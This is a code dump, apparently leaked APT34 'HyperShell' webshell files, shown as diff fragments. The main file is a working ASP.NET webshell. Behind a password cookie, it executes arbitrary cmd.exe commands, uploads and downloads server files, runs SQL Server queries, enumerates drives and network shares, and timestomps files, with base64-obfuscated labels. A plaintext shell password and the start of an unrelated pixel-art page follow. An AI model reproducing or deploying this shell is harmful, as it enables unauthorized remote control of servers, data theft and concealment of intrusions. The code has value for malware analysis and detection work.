tb(pro),tb(cmd),tb(sav),tb(vir),tb(nen),tb(don),tb(tfil),tb(ttar),tb(ttim),tb(sqc),tb(sqq),tb(exadd));
HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
void rm(){/*System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);Response.Redirect(Request.RawUrl);*/}
void c(string p){try{HttpCookie coo=new HttpCookie("p",tb(p));coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);c();}catch(Exception e){l(e.Message);}}
bool c(){try{if(HttpContext.Current.Request.Cookies["p"]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fb(HttpContext.Current.Request.Cookies["p"].Value)+salt)))==pp;if(!aut)rm();return aut;}}catch(Exception e){l(e.Message);}rm();return false;}
void u(HttpPostedFile upl, string sav, bool vir, string nen){try{if(c()){if(upl!=null&&upl.ContentLength>0){string fn=string.IsNullOrEmpty(nen)?System.IO.Path.GetFileName(upl.FileName):nen;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;upl.SaveAs(SaveLocation);l("File uploaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
void baseupl(string baseFile,string baseAddr, bool baseVir){try{if(c()){if(baseFile!=null&&baseFile.Length>0&&!string.IsNullOrEmpty(baseAddr)){string SaveLocation=baseVir?Server.MapPath(baseAddr):baseAddr;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFile));l("File uploaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
void r(string pro, string cmd){try{if(c()){string o = exec(cmd,pro);l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
void z(string don){try{if(c()&&!string.IsNullOrEmpty(don)){byte[] f=System.IO.File.ReadAllBytes(don);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+don.Substring(don.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
void g(string hid, string tfil, string ttar, string ttim){try{if(c()&&!string.IsNullOrEmpty(tfil)){l(string.Empty);if(hid=="1")ti(tfil);else if(hid=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));l("Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil));}}else if(hid=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);l("Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil));}}}}catch(Exception ex){l(ex.Message);}}
void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploaded");}}catch(Exception ex){l(ex.Message);}}
void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
void sq(string sqc, string sqq){try{if(c()){if(!string.IsNullOrEmpty(sqc)){using(System.Data.SqlClient.SqlConnection con=new System.Data.SqlClient.SqlConnection(sqc)){if(string.IsNullOrEmpty(sqq)){try{con.Open();l("Sql Server Connection Successfuly Established");}catch(Exception ex){l("Sql Server Connection Failed :"+Environment.NewLine+ex.ToString());}}else{try{con.Open();System.Data.SqlClient.SqlCommand com=new System.Data.SqlClient.SqlCommand(sqq,con);System.Data.SqlClient.SqlDataAdapter ad=new System.Data.SqlClient.SqlDataAdapter(com);System.Data.DataTable dt=new System.Data.DataTable();ad.Fill(dt);DataGrid grid=new DataGrid();System.Web.UI.WebControls.DataList list=new System.Web.UI.WebControls.DataList();grid.DataSource=dt;grid.DataBind();log.Controls.Add(grid);}catch(Exception ex){l("Error : <br>"+ex.ToString());}}con.Close();}}}}catch(Exception ex){l(ex.Message);}}
string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
void l(string ll){log.InnerHtml=tb(ll);}
string exec(string cmd,string pro = "")
{
System.Diagnostics.Process n=new System.Diagnostics.Process();
n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);
n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;
n.StartInfo.RedirectStandardOutput=true;
n.StartInfo.RedirectStandardError=true;
n.StartInfo.CreateNoWindow=true;
string o=null;
n.Start();
n.StandardInput.WriteLine(cmd);
n.StandardInput.WriteLine("exit");
o =n.StandardOutput.ReadToEnd();
n.WaitForExit();
n.Close();
return o;
}
void gsize(string addr)
{
string ret = "error : -";
try
{
long size = GetDirSize(new DirectoryInfo(addr));
ret = sizeFix(size);
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
Response.Clear();
Response.Write(tb(ret));
Response.End();
}
void exp(string exadd)
{
string ret = "error : -";
try
{
if (exadd.ToLower() == "root")
{
ret = "{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";// in javascript json parser two \ = one \
string netUse = exec("net use");
string[] lines = netUse.Split(new string[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines)
{
if (item.ToLower().StartsWith("ok"))
{
int index = item.IndexOf("\\\\");
ret += ",{\"name\":\"\\\\" + item.Substring(index, item.IndexOf('\\', index + 2) - index) + "\"}";
}
}
ret += "]}";
}
else
{
if (exadd.Trim('\\').Split('\\').Count() == 1) // \\localhost
{
string tmp = exadd.ToLower().TrimEnd('\\');
if (tmp == "\\\\localhost")
{
ret = "{\"dir\":[";
bool isStart = false;
foreach (DriveInfo item in DriveInfo.GetDrives())
{
if (item.IsReady)
{
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}$\",\"tsize\":\"{1}\",\"fsize\":\"{2}\",\"usize\":\"{3}\"}}",item.Name.TrimEnd('\\').TrimEnd(':'),sizeFix(item.TotalSize),sizeFix(item.TotalFreeSpace),sizeFix(item.TotalSize - item.TotalFreeSpace));
isStart = true;
}
}
ret += "]}";
}
else
{
}
}
else // \\localhost\c$\
{
FileAttributes attr = File.GetAttributes(exadd);
if ((attr & FileAttributes.Directory) == FileAttributes.Directory)
{
DirectoryInfo dirInfo = new DirectoryInfo(exadd);
ret = "{" + string.Format("{0},{1}", createJsonDirectory(dirInfo.GetDirectories()), createJsonFile(dirInfo.GetFiles())) + "}";
}
}
}
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
Response.Clear();
Response.Write(tb(ret));
Response.End();
}
long GetDirSize(DirectoryInfo d)
{
long size = 0;
FileInfo[] fis = d.GetFiles();
foreach (FileInfo fi in fis)
{
size += fi.Length;
}
DirectoryInfo[] dis = d.GetDirectories();
foreach (DirectoryInfo di in dis)
{
size += GetDirSize(di);
}
return size;
}
string createJsonDirectory(DirectoryInfo[] dir)
{
string json = "\"dir\":[";
for (int i = 0; i < dir.Length; i++)
{
if (i > 0)
json += ",";
json += "{\"name\":\"" + dir[i].Name + "\"}";
}
json += "]";
return json;
}
string createJsonFile(FileInfo[] file)
{
string json = "\"file\":[";
for (int i = 0; i < file.Length; i++)
{
if (i > 0)
json += ",";
json += "[\"" + file[i].Name + "\",\"" + sizeFix(file[i].Length) + "\"]";
}
json += "]";
return json;
}
string sizeFix(long size)
{
double s = size;
if (s < 1024) return s + " B";
s = s / 1024;
if (s < 1024) return Math.Round(s,2) + " KB";
s = s / 1024;
if (s < 1024) return Math.Round(s,2) + " MB";
s = s / 1024;
return Math.Round(s,2) + " GB";
}
</script>
<style>body,html{margin:0;padding:5px;direction:ltr;background:#aaa;color:#000 !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}g{margin-left:30px;}input[type="text"],input[type="file"],textarea {width:60%;height:25px;background:#cbcbcb;color:#000;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgb(255,36,0);color:#fff;vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
<script>
function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("don")[0].value += d; }
function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1970 00:00:01 GMT;path=/";location.href = location.pathname;}
</script>
<style>
div.tbbt{overflow:hidden;border:1px solid #ccc;}
div.tbbt button{background-color:inherit;float:left;border:none;outline:none;cursor:pointer;padding:14px 16px;transition: 0.3s;font-size:17px;}
div.tbbt button:hover{background-color:#ddd}
div.tbbt button.active{background-color:#ccc}
.tb{display:none;border:1px solid #ccc;border-top:none}
.loader{
border:3px solid #f3f3f3;
border-radius:50%;
border-top:3px solid #3498db;
width:16px;
height:16px;
-webkit-animation: spin 2s linear infinite;
animation:spin 2s linear infinite;
position:absolute;
}
@-webkit-keyframes spin {
0%{ -webkit-transform:rotate(0deg);}
100%{-webkit-transform:rotate(360deg);}
}
@keyframes spin {
0%{ transform:rotate(0deg);}
100%{transform:rotate(360deg);}
}
#objFrame{padding:0 5px 5px 5px}
.objD {
/*background-color: #d8d808;*/
background-color: #23a4ff;
padding: 5px;
display: table;
cursor: pointer;
/*margin-left: 100px;*/
float:left;
margin-left:5px;
}
.objF {
margin-top: 5px;
min-height: 24px;
}
.objS {
/*position: absolute;*/
width: 90px;
text-align: right;
cursor: default;
background-color: #c3c3c3;
padding: 5px;
min-height:14px;
max-height: 14px;
overflow: hidden;
float:left;
}
.objN {
display: table;
padding: 5px;
background-color: #23d7ff;
margin-left: 100px;
cursor: default;
}
.objB {
margin-left:3px;
padding:5px;
}
/*.objL{display:inline-block;margin-left:3px;}*/
#objLocation{padding:0 5px 0 5px;
min-height: 24px;
margin-top: 5px;
}
.objLabel {
/*display: inline-block;
padding: 5px;
width: 87px;
background-color: #c3c3c3;
margin-top:5px;
float:left;*/
}
.objError {
background-color: #ff2e2e;
color: white;
}
.objInfo {
font-size: 10px;
background-color: #83cc83;
line-height: 14px;
}
.sizeLD {
width: 12px;
height: 12px;
margin-left: -54px;
margin-top: -2px;
}
</style>
<script>
var sizeArray = new Array();
function openTab(ev, nm)
{
var i, tb, tblnk;
tb = document.getElementsByClassName("tb");
for (i = 0; i < tb.length; i++) {
tb[i].style.display = "none";
}
tblnk = document.getElementsByClassName("tblnk");
for (i = 0; i < tblnk.length; i++) {
tblnk[i].className = "tblnk";
}
document.getElementById(nm).style.display = "block";
ev.currentTarget.className += " active";
}
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1, c.length);
if(c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function sendAddress()
{
document.getElementById("loader").style.display = "inline-block";
var address = document.getElementsByName("exadd")[0].value;
var info = {
data:"exadd=" + btoa(address),
onSuccess:function(resText){
document.getElementById("loader").style.display = "none";
var data = atob(resText)
makeLocation();
var Frame = document.getElementById("objFrame");
Frame.innerHTML = "";
if(data.startsWith("Error"))
{
addError(Frame, data);
}
else
{
var info = JSON.parse(data);
if(info.dir)
{
var f = document.createElement("div");
f.className="objF";
var s = document.createElement("div");
s.className="objS";
s.innerText = "Get All Size";
s.style.cursor = "pointer";
s.style.fontSize = "12px";
s.onclick = function(){getAllSize();};
f.appendChild(s);
Frame.appendChild(f);
for (var i = 0; i < info.dir.length; i++)
addFolder(Frame, info.dir[i]);
}
if(info.file)
for (var i = 0; i < info.file.length; i++)
addFile(Frame, info.file[i][0], info.file[i][1])
}
}
};
sendData(info);
}
function makeLocation()
{
var loc = document.getElementById("objLocation");
loc.innerHTML = "";
var f = document.createElement("div");
f.className="objF";
var lbl = document.createElement("div");
lbl.className = "objS objLabel";
lbl.innerText = "Location :";
loc.appendChild(lbl);
var curAdd = document.getElementsByName("exadd")[0].value.split("\\");
var sendLoc = "";
if(document.getElementsByName("exadd")[0].value.startsWith("\\\\"))
sendLoc += "\\\\";
for (var i = 0; i < curAdd.length; i++) {
if(curAdd[i] == "")
continue;
sendLoc += curAdd[i] + "\\";
var o = document.createElement("div");
if(i == curAdd.length - 1)
o.style.display = "inline-block";
else
{
o.setAttribute("loc",sendLoc);
o.onclick = function(){
document.getElementsByName("exadd")[0].value = this.getAttribute("loc");
sendAddress();
};
o.className = "objD";
}
o.innerText = curAdd[i] + "\\";
loc.appendChild(o);
}
if(document.getElementsByName("exadd")[0].value.startsWith("\\\\"))
{
loc.childNodes[1].innerText = "\\\\" + loc.childNodes[1].innerText;
}
loc.lastChild.style.display = "inline-block";
loc.lastChild.onclick = function(){};
loc.lastChild.className = "objB";
}
function addError(parent, error)
{
var d = document.createElement("div");
d.className="objD objError";
d.innerText = error;
parent.appendChild(d);
}
function addFolder(parent, dir)
{
var f = document.createElement("div");
f.className="objF";
var d = document.createElement("div");
d.className="objD";
d.innerText = dir.name;
d.onclick = function(){setAddress(this.innerText);};
var s = document.createElement("div");
s.className="objS dir";
if(sizeArray[getCurrentAddress()+"\\"+dir.name])
setSize(s,sizeArray[getCurrentAddress()+"\\"+dir.name]);
else if(dir.usize)
setSize(s,dir.usize);
else
s.innerText = "...";
s.style.cursor = "pointer";
s.onclick = function(){getSize(s,d.innerText);};
f.appendChild(s);
f.appendChild(d);
if(dir.tsize)
{
var inf = document.createElement("div");
inf.className="objD objInfo";
inf.innerText = "Total Size : " + dir.tsize;
f.appendChild(inf);
}
if(dir.fsize)
{
var inf = document.createElement("div");
inf.className="objD objInfo";
inf.innerText = "Free Space : " + dir.fsize;
f.appendChild(inf);
}
parent.appendChild(f);
}
function addFile(parent, name, size)
{
var f = document.createElement("div");
f.className="objF";
var s = document.createElement("div");
s.className="objS";
setSize(s, size)
var n = document.createElement("div");
n.className="objN";
n.innerText=name;
f.appendChild(s);
f.appendChild(n);
parent.appendChild(f);
}
function getCurrentAddress()
{
var address = document.getElementsByName("exadd")[0];
if(address.value.endsWith("\\"))
address.value = address.value.substring(0, address.value.length - 1);
return address.value;
}
function setAddress(name)
{
var address = document.getElementsByName("exadd")[0];
if(address.value.endsWith("\\"))
address.value = address.value.substring(0, address.value.length - 1);
var path = name;
if (path == 'root' || path.startsWith('\\\\'))
address.value = path;
else
address.value += "\\" + name;
sendAddress();
}
function getNextSize(alls)
{
if(alls.length > 0)
{
var s = alls[0];
alls.shift();
console.log(alls);
console.log(s);
getSize(s, s.nextSibling.innerText, function(){getNextSize(alls)});
}
}
function getAllSize()
{
var allSizes = [].slice.call(document.getElementsByClassName("objS dir"));
getNextSize(allSizes);
}
function getSize(objSize, name, callBack)
{
objSize.innerText = "";
var ldr = document.createElement("span");
ldr.className="loader sizeLD";
objSize.appendChild(ldr);
var address = getCurrentAddress() + "\\" + name;
var info = {
data:"gsize=" + btoa(address),
onSuccess:function(resText){
ldr.remove();
var data = atob(resText)
setSize(objSize, data)
if(!data.startsWith("Error"))
sizeArray[address] = data;
if(callBack)
callBack();
}
};
sendData(info);
}
function checkEnter(ev)
{
if(ev.which == 13 || ev.keyCode == 13)
{
sendAddress();
return false;
}
return true;
}
function setSize(obj, size)
{
if(size.startsWith("Error"))
{
obj.title = size;
obj.innerText = "Error";
}
else
obj.innerText = size;
if(size.endsWith("KB"))
obj.style.backgroundColor = "#ece979";
else if(size.endsWith("MB"))
obj.style.backgroundColor = "#ffd36f";
else if(size.endsWith("GB"))
obj.style.backgroundColor = "#ff6f6f";
}
function sendData(info)
{
var data = info.data;
var xh = new XMLHttpRequest();
xh.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200)
{
info.onSuccess(this.responseText);
}
};
xh.open("POST", location.pathname, true);
xh.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xh.send("p=" + readCookie("p") + "&" + data);
}
</script>
</head>
<body>
<div class="tbbt">
<button class="tblnk active" onclick="openTab(event, 'tbMain')">Main</button>
<button class="tblnk" onclick="openTab(event, 'tbDir')">Explorer</button>
</div>
<div id="tbMain" class="tb" style="display:block">
<table>
<tr>
<td class="h"><%=x("QWRkcmVzcw==")%></td>
<td class="b">
<t><%=x("Q3VycmVudA==")%> :</t>
<y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
<input type="button" value="<%=x("VXNl")%>" onclick="use()" />
<input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
<div style="float:right">v5.0</div>
</td>
</tr>
</table>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("TG9naW4=")%></td>
<td class="b">
<t><%=x("RG8gaXQ=")%> :</t>
<input name="p" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
<input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("Q29tbWFuZA==")%></td>
<td class="b">
<t><%=x("UHJvY2Vzcw==")%> :</t>
<input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
<t><%=x("Q29tbWFuZA==")%> :</t>
<input name="cmd" class="mmm" type="text" value='<%= cmd %>' />
<input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post" enctype="multipart/form-data">
<table>
<tr>
<td class="h"><%=x("VXBsb2Fk")%></td>
<td class="b">
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="upl" type="file" /><br>
<t><%=x("U2F2ZSBhcw==")%> :</t>
<input name="sav" class="mmm" type="text" value='<%= sav %>' />
<input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
<t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
<input name="nen" class="mmm" type="text" value='<%= nen %>' />
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form method="post">
<table>
<tr>
<td class="h"><%=x("RG93bmxvYWQ=")%></td>
<td class="b">
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="don" type="text" />
<input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('don')[0].value = btoa(document.getElementsByName('don')[0].value);" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
<td class="b">
<t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
<textarea name="baseFile"></textarea>
<input name="baseVir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
<t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
<input name="baseAddr" class="mmm" type="text" value='<%= baseAddr %>' />
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("U3FsIFNlcnZlcg==")%></td>
<td class="b">
<input style="margin:0 0 3px 192px" type="button" value="<%=x("U3RhbmRhcmQgQ29ubmVjdGlvbiBTYW1wbGU=")%>" onclick="document.getElementsByName('sqc')[0].value = '<%=x("U2VydmVyPS47RGF0YWJhc2U9ZGI7VXNlciBJZD11c2VyO1Bhc3N3b3JkPXBhc3M=")%> '" />
<input style="margin:0 0 3px 0" type="button" value="<%=x("VHJ1c3RlZCBDb25uZWN0aW4gU2FtcGxl")%>" onclick="document.getElementsByName('sqc')[0].value = '<%=x("U2VydmVyPS47RGF0YWJhc2U9ZGI7VHJ1c3RlZF9Db25uZWN0aW9uPVRydWU=")%> '" /><br />
<t><%=x("Q29ubmVjdGlvbiBTdHJpbmc=")%> :</t>
<input name="sqc" class="mmm" type="text" value='<%= sqc %>' /><br />
<t><%=x("UXVlcnk=")%> :</t>
<textarea name="sqq" class="mmm"><%= sqq %></textarea>
<input type="submit" value="<%= x("UnVu") %>" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr />
<form method="post">
<table>
<tr>
<td class="h"><%=x("Q2hhbmdlIENyZWF0aW9uIFRpbWU=")%></td>
<td class="b">
<input name="hid" type="hidden" />
<t><%=x("RmlsZSBuYW1l")%> :</t>
<input name="tfil" class="mmm" type="text" value='<%= tfil %>' />
<input type="submit" value="<%= x("R2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '1'" /><br>
<t><%=x("RnJvbSBUaGlzIEZpbGU=")%> :</t>
<input name="ttar" class="mmm" type="text" value='<%= ttar %>' />
<input type="submit" value="<%= x("U2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '2'" /><br>
<t><%=x("TmV3IFRpbWU=")%> :</t>
<input name="ttim" class="mmm" type="text" value='<%= ttim %>' />
<input type="submit" value="<%= x("U2V0") %>" onclick="subm(); document.getElementsByName('hid')[0].value = '3'" />
</td>
</tr>
</table>
</form>
<hr />
<br />
<pre id="log" runat="server"></pre>
<script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
</div>
<div id="tbDir" class="tb">
<table>
<tr>
<td class="h">Explorer</td>
<td class="b">
<t>Address :</t>
<input name="exadd" class="mmm" type="text" value='<%= exadd %>' onkeypress="return checkEnter(event);" />
<input type="submit" value="Explore" onclick="sendAddress();" style="margin-right:5px;" />
<span id="loader" class="loader" style="display:none"></span>
</td>
</tr>
</table>
<hr />
<div id="objLocation">
<div class="objS">Location :</div><div class="objD objL" onclick="setAddress(this.innerText);">root</div>
</div>
<div id="objFrame">
</div>
</div>
</body>
</html>

1
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/HighShellPass.txt Normal file
View File

@@ -0,0 +1 @@
Th!sN0tF0rFAN

472
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Lab/PicMaker.aspx Normal file
View File

@@ -0,0 +1,472 @@
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="PicMaker.aspx.cs" Inherits="HyperShell.Shell.PicMaker" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
<style>
body{background-color:#7b7b7b}
.LeftPanel{height:100%;width:50%;float:left}
.RightPanel{height:100%;width:50%;float:right}
.Maker{position:relative;float:left}
.Maker div{position:absolute;width:3px;height:3px}
._s1g{background-color:#ffd700}
._s2g{background-color:#d8b600}
._s3g{background-color:#ffe662}
._s7g{background-color:#ff2c53}
._s0{background-color:#e0e0e0}
._s1{background-color:#a0c0e0}
._s2{background-color:#80a0e0}
._s3{background-color:#c0e0e0}
._s4{background-color:#a06040}
._s5{background-color:#e0a080}
._s6{background-color:#a0a0c0}
._s7{background-color:#008000}
._s8{background-color:#606080}
._s9{background-color:#202020}
._s10{background-color:#c0c0e0}
._s11{background-color:#800000}
._s12{background-color:#e00000}
._b0{background-color:#000}
._b2{background-color:#c1b126}
._b3{background-color:#f1fa53}
._b4{background-color:#fefcff}
._b5{background-color:#41e5e6}
._b6{background-color:#05aaea}
._b7{background-color:#1565d6}
#BillCypher{
width: 701px;
height: 701px;
border-top: 1px solid;
border-left: 1px solid;
position: absolute;
left: 25px;
top: 47px;
}
#BillCypher div{
position:absolute;width:10px;height:10px;
border-right: 1px solid;
border-bottom: 1px solid;
}
#color {
}
#result {
position: absolute;
left: 788px;
top: 247px;
}
</style>
<script>
//var colorNum = ['e0e0e0', 'a0c0e0', '80a0e0', 'c0e0e0', 'a06040', 'e0a080', 'a0a0c0', '008000', '606080', '202020', 'c0c0e0', '800000', 'e00000'];
var a = -1;
var color = [
// 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
[a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 1, a, a, a, a, a, a, a, a, a, a, a, a, a, a, a], // 0
[a, a, 1, 1, 1, 1, 1, 1, 1, a, a, a, a, a, a, a, a, a, a, a, a, a, 2, 3, a, a, a, a, a, a, a, a, a, a, a, a, a, a], // 1
[a, a, a, a, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, a, a, a, a, a, a, a, 2, 1, 3, a, a, a, a, a, a, a, a, a, a, a, a, a], // 2
[a, a, a, a, a, a, 1, 1, 1, 1, 3, 3, 3, 3, 1, 1, 1, a, a, a, a, a, a, 2, 1, 3, a, a, a, a, a, a, a, a, a, a, a, a], // 3
[a, a, a, a, a, a, a, a, 2, 1, 1, 1, 3, 3, 3, 3, 3, 1, 1, 1, a, a, a, 2, 2, 1, 3, a, a, a, a, a, a, a, a, a, a, a], // 4
[a, a, a, a, a, a, a, a, a, 2, 2, 1, 1, 1, 3, 3, 3, 3, 3, 1, 1, a, a, 2, 2, 2, 1, 3, a, a, a, a, a, a, a, a, a, a], // 5
[1, 1, 1, 1, 1, a, a, a, a, a, 2, 2, 2, 1, 1, 1, 3, 3, 3, 3, 3, 1, 2, 2, 2, 2, 1, 3, a, a, a, a, a, a, a, a, a, a], // 6
[a, 2, 1, 3, 3, 1, 1, 1, a, a, a, 2, 2, 2, 1, 1, 1, 3, 3, 3, 3, 1, 1, 2, 2, 2, 2, 1, a, a, a, a, a, a, a, a, a, a], // 7
[a, a, 2, 1, 3, 3, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 3, 3, 3, 3, 1, 2, 2, 2, 3, 1, a, a, a, a, a, a, a, a, a], // 8
[a, a, a, 2, 1, 3, 3, 3, 3, 1, 1, 1, 1, 2, 2, 5, 5, 2, 1, 2, 1, 1, 1, 1, 1, 2, 2, 3, 1, a, a, a, a, a, a, a, a, a], // 9
[a, a, a, a, 2, 1, 1, 3, 3, 3, 3, 1, 1, 2, 2, 2, 5, 5, 5, 2, 2, 1, 3, 1, 1, 1, 2, 1, 1, a, a, a, a, a, a, a, a, a], // 10
[a, a, a, a, 2, 2, 1, 1, 1, 3, 3, 3, 1, 2, 1, 2, 4, 5, 5, 5, 1, 1, 1, 3, 3, 1, 1, 1, 1, a, a, a, a, a, a, a, a, a], // 11
[a, a, a, a, a, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 4, 4, 1, 1, 3, 3, 3, 3, 3, 3, 1, 1, 2, a, a, a, a, a, a, a, a, a], // 12
[2, 2, 1, 1, a, a, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 3, 3, 3, 1, 3, 3, 3, 3, 1, 1, a, a, a, a, a, a, a, a, a], // 13
[a, 2, 2, 1, 1, 1, a, 2, 2, 2, 2, 2, 1, 1, 1, 3, 3, 3, 3, 3, 2, 2, 1, 1, 3, 3, 3, 3, 1, a, a, a, a, a, a, a, a, a], // 14
[a, a, 2, 2, 1, 3, 3, 1, 1, 1, 1, 1, 1, 1, 1, 3, 0, 3, 1, 2, 6, 6, 2, 1, 1, 3, 3, 1, 2, a, a, a, a, a, a, a, a, a], // 15
[a, a, a, 2, 2, 1, 3, 3, 3, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 2, 6, 0, 6, 2, 2, 1, 1, 2, 6, a, a, a, a, a, a, a, a, a], // 16
[a, a, a, 2, 2, 2, 1, 3, 3, 3, 3, 3, 3, 1, 1, 1, 1, 1, 1, 2, 6, 0, 0, 6, 6, 2, 2, 2, 6, a, a, a, a, a, a, a, a, a], // 17
[a, a, a, a, 2, 2, 2, 1, 1, 3, 3, 3, 3, 3, 3, 1, 1, 1, 1, 1, 1, 0, 0, 0, 6, 7, 0, 7, 6, a, a, a, a, a, a, a, a, a], // 18
[a, a, a, a, a, 2, 2, 2, 1, 1, 1, 1, 1, 1, 2, 1, 4, 4, 4, 1, 3, 3, 0, 0, 6, 7, 0, 7, 6, a, a, a, a, a, a, a, a, a], // 19
[a, a, a, a, a, a, a, 2, 2, 2, 1, 1, 1, 1, 2, 2, 4, 5, 5, 5, 5, 6, 6, 0, 0, 0, 4, 6, 9, 9, a, a, a, a, a, a, a, a], // 20
[a, a, a, a, a, a, a, a, a, 2, 2, 1, 1, 2, 1, 2, 2, 2, 4, 5, 3, 5, 5, 5, 6, 6, 5, 5, 9, 9, 8, a, a, a, a, a, a, a], // 21
